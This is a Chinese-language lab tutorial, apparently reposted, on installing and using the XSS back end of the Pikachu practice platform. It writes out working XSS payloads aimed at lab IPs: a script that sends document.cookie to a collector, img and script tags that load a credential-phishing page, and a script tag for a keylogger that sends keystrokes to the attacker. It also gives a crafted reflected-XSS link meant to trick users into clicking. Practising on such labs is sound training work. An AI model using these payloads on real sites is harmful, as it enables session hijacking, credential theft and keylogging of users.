pikachu XSS后台的使用和安裝


xss后台的安裝

 

重定向到另一個可信網址  讓點擊者 不知情

 

 

 

 

 1.cookie值獲取

查看源代碼

 在反射型xss(get)頁面下使用

 

<script> document.location = 'http://192.168.50.100/pkxss/xcookie/cookie.php?cookie='   +  document.cookie; </script>

 

 

 

 點提交,會跳轉到首頁,

 

 

 

 http://192.168.50.100/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3E+document.location+%3D+%27http%3A%2F%2F192.168.50.100%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+++%2B++document.cookie%3B+%3C%2Fscript%3E&submit=submit

欺騙用戶去點擊

就會出現第二個

 

 

 反射型xss(get

讓用戶去點擊這個頁面  獲取cookie值

 

2.釣魚結果

<img  src=" http://192.168.50.100/pkxss/xfish/fish.php"  />    img標簽

<script  src=" http://192.168.50.100/pkxss/xfish/fish.php">  </script>  script標簽

 

 

 

 

 

 

 

 

 

 彈窗  輸入信息 ,

 

 

 

釣魚結果中就會顯示

 

 

 

 

 

 

 

 

 

 

什么是同源策略

兩個頁面地址中的協議,域名,端口號一致,則表示同源

為什么瀏覽器要使用同源策略

設置同源策略的主要目的是為了安全,如果沒有同源限制,在瀏覽器中的cookie等其他數據可以任意讀取,不同域下的DOM任意操作,ajax任意請求其他網站的數據,包括隱私數據。

3.鍵盤記錄

過來的post 數據 都會存到數據庫當中

*  允許所有的源被訪問

 

 

再傳到 這里  顯示

 

 

 

 rk.js文件對用戶的鍵盤輸入 進行獲取   賦值給realkey    然后發送到攻擊者的后台

 

 

 

 

 

<script  src=" http://192.168.50.254/pikachu-master/pkxss/xkeypress/rk.js">  </script>  script標簽


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM